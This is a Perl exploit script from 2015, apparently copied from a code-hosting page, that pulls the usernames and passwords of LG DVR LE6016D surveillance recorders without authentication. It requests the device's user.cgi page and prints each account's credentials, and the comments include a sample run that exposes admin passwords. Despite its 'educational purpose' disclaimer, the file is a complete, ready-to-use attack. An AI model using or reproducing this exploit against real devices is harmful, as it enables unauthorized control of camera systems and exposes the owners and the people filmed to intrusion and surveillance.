90 lines
No EOL
3.2 KiB
Perl
Executable file
90 lines
No EOL
3.2 KiB
Perl
Executable file
#!/usr/bin/perl
|
|
#
|
|
# LG DVR LE6016D unauthenticated remote
|
|
# users/passwords disclosure exploit
|
|
#
|
|
#
|
|
# Copyright 2015 (c) Todor Donev
|
|
# <todor.donev at gmail.com>
|
|
# http://www.ethical-hacker.org/
|
|
####
|
|
#
|
|
# Digital video recorder (DVR) surveillance is the use of cameras,
|
|
# often hidden or concealed, that use DVR technology to record
|
|
# video for playback or immediate viewing. As technological
|
|
# innovations have made improvements in the security and
|
|
# surveillance industry, DVR surveillance has become more
|
|
# prominent and allows for easier and more versatile security
|
|
# systems in homes and businesses. A DVR surveillance security
|
|
# system can be designed for indoor use or outdoor use and can
|
|
# often involve hidden security cameras, concealed “nanny cams”
|
|
# for home security, and even personal recording devices hidden
|
|
# on a person.
|
|
#
|
|
####
|
|
#
|
|
# Description:
|
|
# No authentication (login) is required to exploit this vulnerability.
|
|
# This program demonstrates how unpatched security bug would enable
|
|
# hackers to gain control of a vulnerable device while sitting
|
|
# behind their keyboard, potentially thousands of miles away.
|
|
# An unauthenticated attacker that is connected to the DVR's may be
|
|
# able to retrieve the device's administrator password allowing them
|
|
# to directly access the device's configuration control panel.
|
|
#
|
|
####
|
|
#
|
|
# Disclaimer:
|
|
# This or previous programs is for Educational purpose ONLY. Do not
|
|
# use it without permission.The usual disclaimer applies, especially
|
|
# the fact that Todor Donev is not liable for any damages caused by
|
|
# direct or indirect use of the information or functionality provided
|
|
# by these programs. The author or any Internet provider bears NO
|
|
# responsibility for content or misuse of these programs or any
|
|
# derivatives thereof. By using these programs you accept the fact
|
|
# that any damage (dataloss, system crash, system compromise, etc.)
|
|
# caused by the use of these programs is not Todor Donev's
|
|
# responsibility.
|
|
#
|
|
####
|
|
# Use them at your own risk!
|
|
####
|
|
#
|
|
# $ perl lg.pl 133.7.133.7:80
|
|
# LG DVR LE6016D unauthenticated remote
|
|
# users/passwords disclosure exploit
|
|
# u/p: admin/000000
|
|
# u/p: user1/000000
|
|
# u/p: user2/000000
|
|
# u/p: user3/000000
|
|
# u/p: LOGOUT/000000
|
|
# Copyright 2015 (c) Todor Donev
|
|
# <todor.donev at gmail.com>
|
|
# http://www.ethical-hacker.org/
|
|
#
|
|
####
|
|
|
|
use LWP::Simple;
|
|
print " LG DVR LE6016D unauthenticated remote\n users/passwords disclosure exploit\n";
|
|
if (@ARGV == 0) {&usg; &foot;}
|
|
while (@ARGV > 0) {
|
|
$t = shift(@ARGV);
|
|
}
|
|
my $r = get("http://$t/dvr/wwwroot/user.cgi") or die("Error $!");
|
|
for (my $i=0; $i <= 4; $i++){
|
|
if ($r =~ m/<name>(.*)<\/name>/g){
|
|
print " u\/p: $1\/";
|
|
}
|
|
if ($r =~ m/<pw>(.*)<\/pw>/g){
|
|
print "$1\n";
|
|
}
|
|
}
|
|
&foot;
|
|
sub usg(){
|
|
print "\n Usage: perl $0 <target:port>\n Example: perl $0 133.7.133.7:80\n\n";
|
|
}
|
|
sub foot(){
|
|
print " Copyright 2015 (c) Todor Donev\n <todor.donev at gmail.com>\n";
|
|
print " http://www.ethical-hacker.org/\n";
|
|
exit;
|
|
} |